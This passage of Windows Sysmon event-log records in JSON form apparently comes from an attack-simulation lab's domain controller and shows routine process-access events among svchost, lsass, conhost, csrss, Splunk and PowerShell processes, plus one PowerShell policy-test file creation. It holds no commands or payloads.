C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.838","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1733,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.839\r\nSourceProcessGUID: {A837DB8D-01BD-5F25-0000-0010D0930200}\r\nSourceProcessId: 3056\r\nSourceThreadId: 2088\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010DD6D0300}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.839","SourceProcessGUID":"{A837DB8D-01BD-5F25-0000-0010D0930200}","SourceProcessId":"3056","SourceThreadId":"2088","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010DD6D0300}","TargetProcessId":"3892","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1734,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.850\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010DD6D0300}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.850","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010DD6D0300}","TargetProcessId":"3892","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":1735,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.875\r\nProcessGuid: {A837DB8D-01C6-5F25-0000-0010DD6D0300}\r\nProcessId: 3892\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Windows\\Temp\\__PSScriptPolicyTest_cximmww3.tdv.ps1\r\nCreationUtcTime: 2020-08-01 05:46:46.875","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.875","ProcessGuid":"{A837DB8D-01C6-5F25-0000-0010DD6D0300}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Windows\\Temp\\__PSScriptPolicyTest_cximmww3.tdv.ps1","CreationUtcTime":"2020-08-01 05:46:46.875","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1736,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.906\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010DD6D0300}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.906","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010DD6D0300}","TargetProcessId":"3892","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1737,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.906\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010DD6D0300}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.906","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010DD6D0300}","TargetProcessId":"3892","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1738,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.047\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010376B0300}\r\nSourceProcessId: 3872\r\nSourceThreadId: 3876\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.047","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010376B0300}","SourceProcessId":"3872","SourceThreadId":"3876","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1739,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001063890300}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001063890300}","TargetProcessId":"4004","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1740,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.094\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001063890300}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.094","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001063890300}","TargetProcessId":"4004","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1741,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001063890300}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 